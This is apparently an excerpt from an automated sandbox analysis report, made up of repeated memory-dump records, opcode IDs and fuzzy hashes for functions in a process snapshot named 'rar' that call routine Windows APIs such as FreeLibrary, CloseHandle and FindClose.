                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                                                                            • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                            • Instruction ID: e63d838e522881207e02ccdc7973aa16faa0f670a993d843fac69790ed18d8f9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C341D223A09603A2FB68FB109C5827BAA95FF80B44F984435DD0D47AD1DFBCE844C365
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
                                                                                                                                                                                                                                            • Instruction ID: f1f4e8c0f9f4e0ef1e25bee10669c58e997509a80f4d72f235d9f29a3d3fdff3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11723791C682A2E710AB50AD4867BFA94FF40344FD80A35E64D47795DFBDE404C768
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CommandLine
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3253501508-0
                                                                                                                                                                                                                                            • Opcode ID: a301520942a2935eed22be89f00b37226108d57f68a2d87f62cb334619445c9e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79F0D013A8924265FB7C7A615C49277B9815F84760F880634E92D452C2DFDDE441D13C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                            • Instruction ID: ac2ece301d3c817a0e972f17b045f2a273fcb18342671b7699cb5094b5c6a6aa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6E04F52F1D342A1EF6D36222C5107B8A401F56B81E94687ACC1E47382DE5DA455D761
APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
• Instruction ID: ac94f3a686067c1b22c44f26798da5bf9a9774477ae9b276d2e38fc36f7ca8d1
• Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
• Instruction Fuzzy Hash: 90D09E6BE2AD86A6F784FB41EC4D7329A617F5479DFC90A34C41D055A1CFED2054C320
APIs
• FindClose.KERNELBASE(00000000,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C24549
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
• Instruction ID: 8aa6c870c943bdd95cc46a794d15fb2470322a6298ed381b1e5afdac081967ca
• Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
• Instruction Fuzzy Hash: AAC08C32E0188181C608B7298C450241510BF44735FD00330C13E051E08F9800AB8310
APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
• Instruction ID: ae2373483ae2627ae97b4475ee6a2049464c458dae13b62cdad238a91dba5278
• Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
• Instruction Fuzzy Hash: F1F0A423A0868265FB24BB64E840376AA50DF00B78F9D5331D63D151D9CFE8D996C760